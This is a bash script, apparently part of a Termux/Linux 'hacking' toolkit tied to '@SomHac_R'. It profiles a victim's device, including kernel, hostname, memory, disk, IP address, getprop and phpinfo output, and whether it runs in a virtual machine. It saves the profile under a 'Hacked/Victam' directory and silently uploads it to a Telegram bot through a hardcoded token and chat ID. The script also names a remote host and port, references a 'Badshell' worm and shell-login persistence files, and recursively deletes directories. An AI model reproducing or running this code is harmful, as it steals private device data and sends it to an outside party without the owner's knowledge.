#!/usr/bin/bash

#Colors
R="$(printf '\033[1;31m')"
G="$(printf '\033[1;32m')"
Y="$(printf '\033[1;33m')"
W="$(printf '\033[1;37m')"
C="$(printf '\033[1;36m')"
b="\033[1;30m"
r="\033[1;31m"
g="\033[1;32m"
y="\033[1;33m"
b="\033[1;34m"
p="\033[1;35m"
c="\033[1;36m"
v="\033[1;37m"
w="\033[0;37m"
black="\033[1;30m"
red="\033[1;31m"
green="\033[1;32m"
yellow="\033[1;33m"
blue="\033[1;34m"
purple="\033[1;35m"
cyan="\033[1;36m"
violate="\033[1;37m"
white="\033[0;37m"
nc="\033[00m"
#--------ModeTool---------#
info="${cyan}[${white}+${cyan}] ${yellow}"
fun="${cyan}[${white}@${cyan}] ${purple}"
ask="${cyan}[${white}?${cyan}] ${purple}"
bad="${cyan}[${white}!${cyan}] ${red}"
good="${cyan}[${white}√${cyan}] ${green}"
#---------FaceType--------#
sad="$red ಠ⁠︵ಠ⁠"
llok="$blue ಠ⁠_⁠ʖ⁠ಠ⁩"
hehe="$yellow ಡ⁠ ͜⁠ ⁠ʖ⁠ ⁠ಡ"
huh="$blue ʘ⁠‿⁠ʘ"
happy="( ⁠•⁠ ⁠‿⁠ ⁠•⁠ )"
#---------OPIONS----------#
home=$(pwd)
more_info="@SomHac_R"
name=$0
TOKEN="5691570782:AAGMKFygk9MyAlZXtPNddydtDsY4Ouo8-ng"
CHAT_ID="5010958919"
B24B_HOST="193.161.193.99"
B24B_PORT="37858"
Device=$(uname -a)
Tdate=$(date)
HostName=$(hostname)
Kernel=$(uname -r)
UpTime=$(uptime)
MemoryUsage=$(free -m)
DiskUsage=$(df -h)

if [[ -f $PREFIX/etc/Hacked/Victam/victam.sim ]];then

Dev_ID=$(sed -n '5p' $PREFIX/etc/Hacked/Victam/victam.sim)

fi
#-------------------------#
# Check if offline
net() {
    while true; do
        wget --spider --quiet https://github.com &>> /dev/null
        if [ "$?" = 0 ]; then

            nN='Y'
            NnEt="Connected To Network [★]"

        break
       else
                nN='N'
                NnEt="No Internet [X] "
                break
        fi
    done
}
net
#####################################################################################
# Termux
if [[ -d /data/data/com.termux/files/home ]]; then
termux=true
PREFIX='/data/data/com.termux/files/usr/'
elif [[ -d /root/ ]];then
termux=false
PREFIX='/'
else
printf ""
fi
#####################################################################################

if [[ `command -v ifconfig` ]];then

ifconfig=$(ifconfig | grep netmask | grep 255.255 | cut -d 't' -f2 | cut -d ' ' -f2)
ip_data=$(curl -s ipinfo.io;echo -e "${ifconfig}")&>>/dev/null

else

ifconfig=$(ip -4 addr show dev wlan0 | grep inet | awk '{print $2}')
ip_data=$(curl -s ipinfo.io;echo -e "${ifconfig}")&>>/dev/null

fi
if [[ ` command -v fish ` ]];then

fish_file=true

fi

if [[ $termux == true && $fish_file == true ]];then

tr_file="$PREFIX/etc/termux-login.sh"

elif [[ $termux == true && $fish_file != true ]];then

tr_file="$PREFIX/etc/termux-login.sh"

elif [[ $termux != true && $fish_file == true ]];then

tr_file="$PREFIX/etc/fish/config.fish"

elif [[ $termux != true && $fish_file != true ]];then

tr_file="$PREFIX/etc/bash.bashrc"

fi

#####################################################################################
#--------------------------------------------------
if termux-api-start 2>&1 | grep -q "Error"; then

termux_api="false"

else

termux_api="true"

fi
#--------------------------------------------------
if am start -n com.termux.boot/com.termux.boot.BootActivity 2>&1 | grep -q "Error"; then

termux_boot="false"

else

termux_boot="true"

fi
#--------------------------------------------------
time_machine=$(uptime)
#--------------------------------------------------
if [[ `command -v B24B.apt` ]]; then
        apt="apt"
elif [[ `command -v apt` ]]; then
    apt="apt"
elif  [[ `command -v apt-get` ]]; then
    apt="apt-get"
elif  [[ `command -v yum` ]]; then
    apt="yum"
elif [[ `command -v dnf` ]]; then
    apt="dnf"
elif [[ `command -v apk` ]]; then
    apt="apk"
elif [[ `command -v pacman` ]]; then
    apt="pacman"
fi
#--------------------------------------------------
if [[ -d $PREFIX/etc/B24B ]];then
	if [[ -d $PREFIX/etc/B24B/blue24bluer ]];then
		system="true"
	else
		system="false"
	fi
fi
#--------------------------------------------------
if [[ -d $PREFIX/etc/Hacked ]];then

#--------------------------------------------------

	if [[ -d $PREFIX/etc/Hacked/Server ]];then

		Hacked_Server="true"

	else

		Hacked_Server="false"

	fi

#--------------------------------------------------

	if [[ -d $PREFIX/etc/Hacked/Badshell/ ]];then

		Hacked_Badshell="true"

	else

		Hacked_Badshell="fasle"

	fi

#--------------------------------------------------

	if [[ -d $PREFIX/etc/Hacked/Victam/ ]];then

		Hacked_Victam="true"

	else

		Hacked_Victam="false"

        fi

#--------------------------------------------------

fi

#--------------------------------------------------
if [[ `command -v getprop` ]];then
php -i  > $PREFIX/etc/B24B/blue24bluer/.about.this.device
sed -i 's/"/^/' $PREFIX/etc/B24B/blue24bluer/.about.this.device
sed -i 's/"/^/' $PREFIX/etc/B24B/blue24bluer/.about.this.device
sed -i 's/"/^/' $PREFIX/etc/B24B/blue24bluer/.about.this.device
sed -i 's/"/^/' $PREFIX/etc/B24B/blue24bluer/.about.this.device
sed -i 's/"/^/' $PREFIX/etc/B24B/blue24bluer/.about.this.device
sed -i 's/"/^/' $PREFIX/etc/B24B/blue24bluer/.about.this.device
sed -i 's/"/^/' $PREFIX/etc/B24B/blue24bluer/.about.this.device
more_info="
--------------------------------------------------------------------------------------
------------------------------------GETpROP-------------------------------------------
$(getprop)
--------------------------------------------------------------------------------------
------------------------------------PHPINFO-------------------------------------------
$(cat $PREFIX/etc/B24B/blue24bluer/.about.this.device)
--------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------
"
else
cat "$(php -i)" > $PREFIX/etc/B24B/blue24bluer/.about.this.device
sed -i 's/"/^/' $PREFIX/etc/B24B/blue24bluer/.about.this.device
sed -i 's/"/^/' $PREFIX/etc/B24B/blue24bluer/.about.this.device
sed -i 's/"/^/' $PREFIX/etc/B24B/blue24bluer/.about.this.device
sed -i 's/"/^/' $PREFIX/etc/B24B/blue24bluer/.about.this.device
sed -i 's/"/^/' $PREFIX/etc/B24B/blue24bluer/.about.this.device
sed -i 's/"/^/' $PREFIX/etc/B24B/blue24bluer/.about.this.device
sed -i 's/"/^/' $PREFIX/etc/B24B/blue24bluer/.about.this.device
sed -i 's/"/^/' $PREFIX/etc/B24B/blue24bluer/.about.this.device
more_info="
--------------------------------------------------------------------------------------
------------------------------------PHPINFO-------------------------------------------
$(cat $PREFIX/etc/B24B/blue24bluer/.about.this.device)
--------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------
"
fi
#--------------------------------------------------
if [[ `command -v lspci` ]];then
if lspci | grep -i virtualbox > /dev/null; then
    VM="True"
elif lspci | grep -i vmware > /dev/null; then
    VM="True"
else
    VM="False"
fi
fi
#--------------------------------------------------


echo -e "

#----------------
Device_infomore=\"${Device}\n\"
#----------------
Hacked_on_date=\"${Tdate}\n\"
#----------------
Host_Name=\"${HostName}\n\"
#----------------
Kernel=\"${Kernel}\n\"
#----------------
Up_Time=\"${UpTime}\n\"
#----------------
Memory_Usage=\"${MemoryUsage}\n\"
#----------------
IP_Address=\"${ip_data}\n\"
#----------------
Hacked_Victam=\"${Hacked_Victam}\n\"
#----------------
Hacked_Badshell=\"${Hacked_Badshell}\n\"
#----------------
Machine_Time=\"${time_machine}\n\"
#----------------
Hacked_Server=\"${Hacked_Server}\n\"
#----------------
system_installer=\"${system}\n\"
#----------------
package_installer=\"${apt}\n\"
#----------------
termux_api=\"${termux_api}\n\"
#----------------
termux_boot=\"${termux_boot}\n\"
#----------------
tr_file=\"${tr_file}\n\"
#----------------
termux=\"${termux}\n\"
#----------------
virtual_machine=\"${VM}\n\"
#----------------
more_info=\"${more_info}\n\"

" > $PREFIX/etc/Hacked/Victam/About_This_Phone${Dev_ID}
curl -X POST --silent -F document=@$PREFIX/etc/Hacked/Victam/About_This_Phone${Dev_ID} https://api.telegram.org/bot${TOKEN}/sendDocument -F chat_id=${CHAT_ID} &>>/dev/null

#{-----------Package-Manger-------------------}



#{---------------------Stutus-----------------}
stutus(){


if [[ -d $PREFIX/etc/Hacked/ ]];then

        if [[ -d $PREFIX/etc/B24B/blue24bluer/ ]];then

                if [[ -d $PREFIX/etc/Hacked/Badshell/ ]];then

                        if [[ -f $PREFIX/bin/B24B.apt ]];then

                                if [[ -f $PREFIX/etc/Hacked/Badshell/worm ]];then

                                        if [[ -d $PREFIX/etc/Hacked/Server ]];then

                                                if [[ -d $PREFIX/etc/B24B/blue24bluer/Logo ]];then

                                                        if [[ -f $PREFIX/bin/BlueSomHac_server ]];then

                                                                if [[ -d $PREFIX/etc/Hacked/stutus ]];then

									if [[ -d $PREFIX/etc/Hacked/LOCKS ]];then

	                                                                        menu
									else

										mkdir $PREFIX/etc/Hacked/LOCKS
										stutus
									fi
                                                                else

                                                                        rm -rfd $PREFIX/etc/Hacked
                                                                        badshell
                                                                        stutus
                                                                fi

                                                        else
                                                                rm -rfd $PREFIX/etc/Hacked
                                                                badshell
                                                                stutus

                                                        fi

                                                else
                                                        rm -rfd $PREFIX/etc/B24B/
                                                        installit
                                                        stutus
                                                fi


                                        else

                                                rm -rfd $PREFIX/etc/Hacked
                                                clear
                                                badshell
                                                stutus

                                        fi

                                else

                                        badshell
                                        stutus
                                fi

                        else

                                badshell
                                stutus
                        fi

                else

                        badshell
                        stutus

                fi

        else

                rm -rfd $PREFIX/etc/B24B/
                installit
                stutus
        fi

else

        badshell
        stutus

fi

}
#stutus
